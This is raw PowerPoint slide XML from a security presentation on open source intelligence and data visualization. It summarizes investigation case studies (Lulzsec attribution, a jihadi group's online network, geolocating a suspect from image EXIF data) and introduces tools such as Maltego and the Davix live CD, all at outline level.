              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Result: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identified several members of the group with enough information for Law Enforcement to take next steps </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>50</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6467982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Lulzsec Online Persona to Real People</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>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B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Example_1_Lulz_Sabu.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1141367"/>
            <a:ext cx="8610600" cy="4911904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>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35526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Social Media – Online Posting to Locations </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Background </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Asked to investigate a posting to News service blog entry. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Article was about Syrian actions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Online posting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Maltego </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social Media resources </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Discovered a pro-Assad jihadi groups online presence </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2 front companies used for distributing jihadi materials </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2 dozen personalities, names, email address, phone numbers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dozens of sympathizer sites that all were used to distribute materials</a:t>
            </a:r>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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843508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Maltego -</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Displayed as a demo source image not sharable </a:t>
            </a:r>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53</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919460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Social Media, Images and Geo-Location</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Background: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Asked to try and determine if location of a suspect could be found using their online postings and images they were uploading </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>EXIF information from posted images </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Custom scripts for extracting information from image files </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Custom scripts for using social media APIs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Result </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Found enough supporting evidence that when combined with topographical information; the location of the suspect was confirmed </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</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7091464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Public Network Enumeration </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OSINT also useful in mapping and understanding a network from outside </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>United Nations Network and dual-homing servers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Randomly searching a customer network to identify patching and lifecycle issues </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>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55</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30586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United Nations – Dual Homing </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MALTEGO Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</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367189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Discovering that just out of life server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MALTEGO Image showing out of date web server</a:t>
            </a:r>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57</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480147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Demo’s - Time permitting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tracking APT down to the individual </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Atlantic Risk – early warning for Phishing hosts</a:t>
            </a:r>
          </a:p>
          <a:p>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58</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194855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4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A picture can speak a thousand words </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visualization can help play a key role in cyber events </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visualization when combined with OSINT methods </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lots of great resources and examples </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visualization can help make decisions quicker, and more accurate </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open Source Intelligence, learn it, use it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plays a key role in understanding and researching attackers and attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serves as a great method to map and understand your own networks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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186282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 What is it good for?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231187" y="6464300"/>
            <a:ext cx="455613" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Uses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detect the Expected and reveal the Unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reducing analysis time </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improving IT and Security decisions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Needs/Determination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is trying to be explained </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to be explained </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Audience of the data </a:t>
            </a:r>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740283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Thank you 	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Questions / Comments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Contact info: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jake Babbin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jake.babbin@crypsisgroup.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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8992740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Davix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Live CD collection </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231187" y="6464300"/>
            <a:ext cx="455613" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1204913"/>
            <a:ext cx="4051905" cy="5169277"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DAVIX, a live CD for data analysis and visualization, brings the most important free tools for data processing and visualization to your desk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>				- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://davix.secviz.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed by friend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Raffael</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Marty </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easy way to get access to lots of visualization tools in one place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code is dated as it hasn’t been updated since 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Great Reference guide </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="raffy_book"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="1142999"/>
            <a:ext cx="3657600" cy="4838095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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6349209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Davix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Gallery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231187" y="6464300"/>
            <a:ext cx="455613" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="sec_viz_map_users_sending_inapprop_emails"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-40915" r="-40915"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1479250"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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97770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Davix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Gallery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231187" y="6464300"/>
            <a:ext cx="455613" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="sec_viz_org_BGP_AS_Peering"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-12328" r="-12328"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1479250"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Proprietary - Releasable upon request from author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582139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8291</TotalTime>
  <Words>4492</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
